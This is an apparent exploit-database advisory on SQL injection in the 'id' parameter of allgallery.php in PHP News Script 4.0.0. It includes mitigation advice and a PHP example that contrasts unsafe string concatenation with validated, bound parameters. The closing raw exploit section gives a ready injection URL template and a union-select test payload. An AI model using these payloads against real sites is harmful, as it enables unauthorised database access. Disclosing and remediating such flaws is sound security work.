Vendor: PHP News Script
By: Meisam Monsef
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PHP News Script
Affected Version From: 4.0.0
Affected Version To: 4.0.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:phpnewsscript:php_news_script:4.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS
Year: 2015

PHP News Script 4.0.0 Sql Injection

The 'id' parameter of the 'allgallery.php' script is vulnerable to SQL injection: an attacker can supply arbitrary SQL in that parameter and alter the queries the script executes.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
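The standard remedy is to validate that 'id' is the numeric value the script expects and, independently of that check, to pass it to the database as a bound parameter rather than concatenating it into the query string. The following is an added example written for this page, not code from PHP News Script or from the advisory author; the hypothetical gallery lookup, the table name `gallery`, its columns and the function names are assumptions chosen for illustration.

```php
<?php
// Added example (not PHP News Script's own code): a hypothetical
// allgallery.php-style lookup shown in its injectable form and in a
// hardened form. Table and column names are assumed.

// Vulnerable pattern: the raw query parameter is concatenated into SQL,
// so a quote character in 'id' closes the literal and whatever follows
// is parsed as SQL. Returned as a string here only to show the effect.
function buildGalleryQueryUnsafe(string $id): string
{
    return "SELECT id, title FROM gallery WHERE id='" . $id . "'";
}

// Hardened: reject anything that is not a positive integer up front, then
// bind the value as a typed parameter so it can never be parsed as SQL.
function fetchGallery(PDO $db, string $rawId): ?array
{
    // FILTER_VALIDATE_INT returns false for inputs such as "1' or 1=1" or "abc".
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // invalid id: a real handler would answer 400 here
    }
    $stmt = $db->prepare('SELECT id, title FROM gallery WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-contained demo on an in-memory SQLite database with constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE gallery (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO gallery (id, title) VALUES (1, 'First'), (2, 'Second')");

// Constructed sample inputs: a valid id, a quote-breaking string, and junk.
$inputs = ['2', "-100' union select user()#", 'abc'];
foreach ($inputs as $in) {
    echo "unsafe SQL: " . buildGalleryQueryUnsafe($in) . PHP_EOL;
    $row = fetchGallery($db, $in);
    echo "hardened  : " . ($row === null ? 'rejected or not found' : $row['title']) . PHP_EOL;
}
```

Validation and parameter binding are both kept because they fail independently: the integer check gives an early, loggable rejection of malformed input, while the prepared statement guarantees that even a value which slips past validation is treated as data, not as query text.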

Exploit-DB raw data:

# Exploit Title: PHP News Script 4.0.0 Sql Injection
# Date: 2015-08-01
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://phpnewsscript.com/
# Version: 4.0.0
# Tested on: CentOS

Exploit:
http://server/allgallery.php?id=-9999%27+[sql-command]+%23

Test:
http://server/demo/allgallery.php?id=-100%27+union+select+user()%23